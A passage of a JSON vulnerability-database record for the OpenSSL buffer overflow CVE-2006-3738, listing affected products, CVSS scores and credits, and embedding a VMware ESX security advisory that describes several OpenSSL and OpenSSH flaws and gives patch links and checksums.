            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "_id": null,
            "model": "linux i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "5.10"
          },
          {
            "_id": null,
            "model": "netbsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netbsd",
            "version": "3.0.2"
          },
          {
            "_id": null,
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.3"
          },
          {
            "_id": null,
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "2.0.2"
          },
          {
            "_id": null,
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.5.1.639"
          },
          {
            "_id": null,
            "model": "workcentre pro",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "245"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.5"
          },
          {
            "_id": null,
            "model": "openvpn",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.9"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.5.2"
          },
          {
            "_id": null,
            "model": "linux m68k",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "networks meridian option 11c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1-0"
          },
          {
            "_id": null,
            "model": "linux sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "ftp server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.1.0.4"
          },
          {
            "_id": null,
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0(2)"
          },
          {
            "_id": null,
            "model": "linux hppa",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "netbsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netbsd",
            "version": "3.0.1"
          },
          {
            "_id": null,
            "model": "messaging storage server mm3.0",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "grid engine 64-bit sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "5.3"
          },
          {
            "_id": null,
            "model": "enterprise linux ws",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3"
          },
          {
            "_id": null,
            "model": "s8500 cm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "s8710 r2.0.1",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "3.0.1"
          },
          {
            "_id": null,
            "model": "advanced workstation for the itanium processor ia64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "hat red hat network satellite server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "red",
            "version": "4.2"
          },
          {
            "_id": null,
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1700"
          },
          {
            "_id": null,
            "model": "netbsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netbsd",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "application \u0026 content networking software",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "enterprise linux es",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3"
          },
          {
            "_id": null,
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.7"
          },
          {
            "_id": null,
            "model": "grid engine update4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "-releng",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.4"
          },
          {
            "_id": null,
            "model": "ons mspp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154540"
          },
          {
            "_id": null,
            "model": "5.4-stable",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "ftp server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.3.30"
          },
          {
            "_id": null,
            "model": "project openssl j",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "_id": null,
            "model": "project openssl d",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "_id": null,
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0.3.728"
          },
          {
            "_id": null,
            "model": "call manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.3(1)"
          },
          {
            "_id": null,
            "model": "linux -current",
            "scope": null,
            "trust": 0.3,
            "vendor": "slackware",
            "version": null
          },
          {
            "_id": null,
            "model": "grid engine update6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "ciscoworks common management foundation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "home",
            "scope": null,
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": null
          },
          {
            "_id": null,
            "model": "stonebeat fullcluster for firewall-1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154543.3"
          },
          {
            "_id": null,
            "model": "ciscosecure acs for windows and unix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "hardware management console for iseries r2.1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "tru64 b-4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "5.1"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.4.1"
          },
          {
            "_id": null,
            "model": "stonebeat fullcluster for isa server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "message networking",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.5"
          },
          {
            "_id": null,
            "model": "call manager es55",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0(0)"
          },
          {
            "_id": null,
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.0"
          },
          {
            "_id": null,
            "model": "css11500 content services switch",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.1"
          },
          {
            "_id": null,
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.5"
          },
          {
            "_id": null,
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "server 0.9.4e",
            "scope": null,
            "trust": 0.3,
            "vendor": "filezilla",
            "version": null
          },
          {
            "_id": null,
            "model": "tru64 b-3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "5.1"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": null,
            "trust": 0.3,
            "vendor": "gentoo",
            "version": null
          },
          {
            "_id": null,
            "model": "desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "linux alpha",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.5.1.657"
          },
          {
            "_id": null,
            "model": "secure enterprise linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "trustix",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "3.3.1"
          },
          {
            "_id": null,
            "model": "desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "project openssl k",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "_id": null,
            "model": "advanced workstation for the itanium processor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "workcentre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "265"
          },
          {
            "_id": null,
            "model": "call manager es24",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "hardware management console for pseries",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.2.1"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.2"
          },
          {
            "_id": null,
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.3"
          },
          {
            "_id": null,
            "model": "gss global site selector",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "44910"
          },
          {
            "_id": null,
            "model": "s8300 r2.0.1",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "computing snapgear u2",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "secure",
            "version": "3.1.4"
          },
          {
            "_id": null,
            "model": "novell linux pos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9"
          },
          {
            "_id": null,
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154542.3(5)"
          },
          {
            "_id": null,
            "model": "ftp server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.01"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.5.1"
          },
          {
            "_id": null,
            "model": "project openssl beta1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "_id": null,
            "model": "-releng",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.3"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.6"
          },
          {
            "_id": null,
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.8.5"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.0.2"
          },
          {
            "_id": null,
            "model": "mds",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "9000"
          },
          {
            "_id": null,
            "model": "download accelarator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "prozilla",
            "version": "1.3.2"
          },
          {
            "_id": null,
            "model": "solaris 10 x86",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "3.2"
          },
          {
            "_id": null,
            "model": "s8700 r2.0.1",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "computing snapgear sg580",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "0"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.4"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.8"
          },
          {
            "_id": null,
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1100"
          },
          {
            "_id": null,
            "model": "stonebeat securitycluster",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.5"
          },
          {
            "_id": null,
            "model": "ons 15454e optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "openvms secure web server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "1.1-1"
          },
          {
            "_id": null,
            "model": "application control engine module",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.1"
          },
          {
            "_id": null,
            "model": "linux ia-32",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "3.2.1"
          },
          {
            "_id": null,
            "model": "solaris 9 x86",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "project openssl m",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "_id": null,
            "model": "gss global site selector",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "44920"
          },
          {
            "_id": null,
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.6"
          },
          {
            "_id": null,
            "model": "project openssl l",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "_id": null,
            "model": "linux professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.2"
          },
          {
            "_id": null,
            "model": "network satellite (for rhel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4)4.2"
          },
          {
            "_id": null,
            "model": "suse linux openexchange server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "workcentre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "238"
          },
          {
            "_id": null,
            "model": "project openssl b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.2"
          },
          {
            "_id": null,
            "model": "linux mandrake x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "2007.0"
          },
          {
            "_id": null,
            "model": "ons mstp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154540"
          },
          {
            "_id": null,
            "model": "networks wlan access point",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "7250.0"
          },
          {
            "_id": null,
            "model": "project openssl j",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "_id": null,
            "model": "multimedia",
            "scope": null,
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": null
          },
          {
            "_id": null,
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.0(2)"
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#386964"
          },
          {
            "db": "CERT/CC",
            "id": "VU#845620"
          },
          {
            "db": "CERT/CC",
            "id": "VU#547300"
          },
          {
            "db": "BID",
            "id": "20249"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200609-536"
          },
          {
            "db": "NVD",
            "id": "CVE-2006-3738"
          }
        ]
      },
      "credits": {
        "_id": null,
        "data": "Tavis Ormandy taviso@gentoo.org Will Drewry wad@google.com",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-200609-536"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2006-3738",
      "cvss": {
        "_id": null,
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CVE-2006-3738",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.0,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2006-3738",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "CARNEGIE MELLON",
                "id": "VU#386964",
                "trust": 0.8,
                "value": "0.32"
              },
              {
                "author": "CARNEGIE MELLON",
                "id": "VU#845620",
                "trust": 0.8,
                "value": "7.56"
              },
              {
                "author": "CARNEGIE MELLON",
                "id": "VU#547300",
                "trust": 0.8,
                "value": "2.53"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-200609-536",
                "trust": 0.6,
                "value": "CRITICAL"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#386964"
          },
          {
            "db": "CERT/CC",
            "id": "VU#845620"
          },
          {
            "db": "CERT/CC",
            "id": "VU#547300"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200609-536"
          },
          {
            "db": "NVD",
            "id": "CVE-2006-3738"
          }
        ]
      },
      "description": {
        "_id": null,
        "data": "Buffer overflow in the SSL_get_shared_ciphers function in OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d, and earlier versions has unspecified impact and remote attack vectors involving a long list of ciphers. A flaw in the OpenSSL library could allow a remote attacker to cause a denial of service on an affected application. Multiple RSA implementations fail to properly handle RSA signatures. This vulnerability may allow an attacker to forge RSA signatures. \nSuccessfully exploiting this issue may result in the execution of arbitrary machine code in the context of applications that use the affected library. Failed exploit attempts may crash applications, denying service to legitimate users. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n- -------------------------------------------------------------------\n                   VMware Security Advisory\n\nAdvisory ID:       VMSA-2007-0001\nSynopsis:          VMware ESX server security updates\nIssue date:        2007-01-08\nUpdated on:        2007-01-08\nCVE:               CVE-2006-3589 CVE-2006-2937 CVE-2006-2940\n                   CVE-2006-3738 CVE-2006-4339 CVE-2006-4343\n                   CVE-2006-4980\n- -------------------------------------------------------------------\n\n1. Summary:\n\nUpdated ESX Patches address several security issues. \n\n2. Relevant releases:\n\nVMware ESX 3.0.1 without patch ESX-9986131\nVMware ESX 3.0.0 without patch ESX-3069097\n\nVMware ESX 2.5.4 prior to upgrade patch 3\nVMware ESX 2.5.3 prior to upgrade patch 6\nVMware ESX 2.1.3 prior to upgrade patch 4\nVMware ESX 2.0.2 prior to upgrade patch 4\n\n3. Problem description:\n\nProblems addressed by these patches:\n\na. Incorrect permissions on SSL key files generated  by vmware-config\n(CVE-2006-3589):\n\n    ESX 3.0.1: does not have this problem\n    ESX 3.0.0: does not have this problem\n    ESX 2.5.4: corrected by ESX 2.5.4 Upgrade Patch 3 (Build# 36502)\n    ESX 2.5.3: corrected by ESX 2.5.3 Upgrade Patch 6 (Build# 35703)\n    ESX 2.1.3: corrected by ESX 2.1.3 Upgrade Patch 4 (Build# 35803)\n    ESX 2.0.2: corrected by ESX 2.0.2 Upgrade Patch 4 (Build# 35801)\n\n    A possible security issue with the configuration program\n    vmware-config which could set incorrect permissions on SSL key\n    files. Local users may be able to obtain access to the SSL key\n    files. The Common Vulnerabilities and Exposures project\n    (cve.mitre.org) assigned the name CVE-2006-3589 to this issue. \n\nb. OpenSSL library vulnerabilities:\n\n    ESX 3.0.1: corrected by ESX 3.0.1 Patch ESX-9986131\n    ESX 3.0.0: corrected by ESX 3.0.0 Patch ESX-3069097\n    ESX 2.5.4: corrected by ESX 2.5.4 Upgrade Patch 3 (Build# 36502)\n    ESX 2.5.3: corrected by ESX 2.5.3 Upgrade Patch 6 (Build# 35703)\n    ESX 2.1.3: corrected by ESX 2.1.3 Upgrade Patch 4 (Build# 35803)\n    ESX 2.0.2: corrected by ESX 2.0.2 Upgrade Patch 4 (Build# 35801)\n\n    (CVE-2006-2937) OpenSSL 0.9.7 before 0.9.7l and 0.9.8 before 0.9.8d\n    allows remote attackers to cause a denial of service (infinite\n    loop and memory consumption) via malformed ASN.1 structures that\n    trigger an improperly handled error condition. \n\n    (CVE-2006-2940) OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d,\n    and earlier versions allows attackers to cause a denial of service\n    (CPU consumption) via parasitic public keys with large (1) \"public\n    exponent\" or (2) \"public modulus\" values in X.509 certificates that\n    require extra time to process when using RSA signature verification. \n\n    (CVE-2006-4339) OpenSSL before 0.9.7, 0.9.7 before 0.9.7k, and 0.9.8\n    before 0.9.8c, when using an RSA key with exponent 3, removes PKCS-1\n    padding before generating a hash, which allows remote attackers to\n    forge a PKCS #1 v1.5 signature that is signed by that RSA key and\n    prevents OpenSSL from correctly verifying X.509 and other\n    certificates that use PKCS #1. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    assigned the names CVE-2006-2937, CVE-2006-2940, CVE-2006-3738,\n    CVE-2006-4339, and CVE-2006-4343 to these issues. \n\nc. Updated OpenSSH package addresses the following possible security issues:\n\n    ESX 3.0.1: corrected by Patch ESX-9986131\n    ESX 3.0.0: corrected by Patch ESX-3069097\n    ESX 2.5.4: does not have these problems\n    ESX 2.5.3: does not have these problems\n    ESX 2.1.3: does not have these problems\n    ESX 2.0.2: does not have these problems\n\n    (CVE-2004-2069) sshd.c in OpenSSH 3.6.1p2 and 3.7.1p2 and possibly\n    other versions, when using privilege separation, does not properly\n    signal the non-privileged process when a session has been terminated\n    after exceeding the LoginGraceTime setting, which leaves the\n    connection open and allows remote attackers to cause a denial of\n    service (connection consumption). \n\n    (CVE-2006-0225) scp in OpenSSH 4.2p1 allows attackers to execute\n    arbitrary commands via filenames that contain shell metacharacters\n    or spaces, which are expanded twice. \n\n    (CVE-2003-0386) OpenSSH 3.6.1 and earlier, when restricting host\n    access by numeric IP addresses and with VerifyReverseMapping\n    disabled, allows remote attackers to bypass \"from=\" and \"user@host\"\n    address restrictions by connecting to a host from a system whose\n    reverse DNS hostname contains the numeric IP address. \n\n    (CVE-2006-4924) sshd in OpenSSH before 4.4, when using the version 1\n    SSH protocol, allows remote attackers to cause a denial of service\n    (CPU consumption) via an SSH packet that contains duplicate blocks,\n    which is not properly handled by the CRC compensation attack\n    detector. \n\n    NOTE: ESX by default disables version 1 SSH protocol. \n\n    (CVE-2006-5051) Signal handler race condition in OpenSSH before 4.4\n    allows remote attackers to cause a denial of service (crash), and\n    possibly execute arbitrary code if GSSAPI authentication is enabled,\n    via unspecified vectors that lead to a double-free. \n\n    NOTE: ESX doesn\u0027t use GSSAPI by default. \n\n    (CVE-2006-5794) Unspecified vulnerability in the sshd Privilege\n    Separation Monitor in OpenSSH before 4.5 causes weaker verification\n    that authentication has been successful, which might allow attackers\n    to bypass authentication. \n\n    NOTE: as of 20061108, it is believed that this issue is only\n    exploitable by leveraging vulnerabilities in the unprivileged\n    process, which are not known to exist. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    assigned the names CVE-2004-2069, CVE-2006-0225, CVE-2003-0386,\n    CVE-2006-4924, CVE-2006-5051, and CVE-2006-5794 to these issues. \n\nd. Object reuse problems with newly created virtual disk (.vmdk or .dsk)\nfiles:\n\n    ESX 3.0.1: does not have this problem\n    ESX 3.0.0: does not have this problem\n    ESX 2.5.4: corrected by ESX 2.5.4 Upgrade Patch 3 (Build# 36502)\n    ESX 2.5.3: corrected by ESX 2.5.3 Upgrade Patch 6 (Build# 35703)\n    ESX 2.1.3: corrected by ESX 2.1.3 Upgrade Patch 4 (Build# 35803)\n    ESX 2.0.2: corrected by ESX 2.0.2 Upgrade Patch 4 (Build# 35801)\n\n    A possible security issue with virtual disk (.vmdk or .dsk) files\n    that are newly created, but contain blocks from recently deleted\n    virtual disk files.  Information belonging to the previously\n    deleted virtual disk files could be revealed in newly created\n    virtual disk files. \n\n    VMware recommends the following workaround: When creating new\n    virtual machines on an ESX Server that may contain sensitive\n    data, use vmkfstools with the -W option. This initializes the\n    virtual disk with zeros.  NOTE: ESX 3.x defines this option as -w. \n\ne. Buffer overflow in Python function repr():\n\n    ESX 3.0.1: corrected by Patch ESX-9986131\n    ESX 3.0.0: corrected by ESX-3069097\n    ESX 2.5.4: does not have this problem\n    ESX 2.5.3: does not have this problem\n    ESX 2.1.3: does not have this problem\n    ESX 2.0.2: does not have this problem\n\n    A possible security issue with how the Python function repr()\n    function handles UTF-32/UCS-4 strings. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    assigned the name CVE-2006-4980 to this issue. \n\n4. Solution:\n\nPlease review the Patch notes for your version of ESX and verify the md5sum. \n\n  ESX 3.0.1\n  http://www.vmware.com/support/vi3/doc/esx-9986131-patch.html\n  md5usm: 239375e107fd4c7af57663f023863fcb\n\n  ESX 3.0.0\n  http://www.vmware.com/support/vi3/doc/esx-3069097-patch.html\n  md5sum: ca9947239fffda708f2c94f519df33dc\n\n  ESX 2.5.4\n  http://www.vmware.com/support/esx25/doc/esx-254-200612-patch.html\n  md5sum: 239375e107fd4c7af57663f023863fcb\n\n  ESX 2.5.3\n  http://www.vmware.com/support/esx25/doc/esx-253-200612-patch.html\n  md5sum: f90fcab28362edbf2311f3ca90cc7739\n\n  ESX 2.1.3\n  http://www.vmware.com/support/esx21/doc/esx-213-200612-patch.html\n  md5sum: 7d7d0e40f4dccd5ca64b9c13a856da8f\n\n  ESX 2.0.2\n  http://www.vmware.com/support/esx2/doc/esx-202-200612-patch.html\n  md5sum: 925e70f28d17714c53fdbd24de64329f\n\n\n5. References:\n\nESX 3.0.0 Patch URL:\nhttp://www.vmware.com/support/vi3/doc/esx-3069097-patch.html\nKnowledge base URL:  http://kb.vmware.com/kb/3069097\n\nESX 3.0.1 Patch URL:\nhttp://www.vmware.com/support/vi3/doc/esx-9986131-patch.html\nKnowledge base URL:  http://kb.vmware.com/kb/9986131\n\nESX 2.5.4 Patch URL:\nhttp://www.vmware.com/support/esx25/doc/esx-254-200612-patch.html\n\nESX 2.5.3 Patch URL:\nhttp://www.vmware.com/support/esx25/doc/esx-253-200612-patch.html\n\nESX 2.1.3 Patch URL:\nhttp://www.vmware.com/support/esx21/doc/esx-213-200612-patch.html\n\nESX 2.0.2 Patch URL:\nhttp://www.vmware.com/support/esx2/doc/esx-202-200612-patch.html\n\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3589\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2937\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2940\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3738\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4339\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4343\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4980\n\n6. Contact:\n\nhttp://www.vmware.com/security\n\nVMware Security Response Policy\nhttp://www.vmware.com/vmtn/technology/security/security_response.html\n\nE-mail:  security@vmware.com\n\nCopyright 2007 VMware Inc. All rights reserved. \n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.6 (GNU/Linux)\n\niD8DBQFFovs16KjQhy2pPmkRCMfyAKCXhdGwZyXW5VzSwcOmu2NNXKN/OwCgo+CE\nneFG0RikD74TCYeXKW6CBy4=\n=9/6k\n-----END PGP SIGNATURE-----\n\n_______________________________________________\nFull-Disclosure - We believe in it. \nCharter: 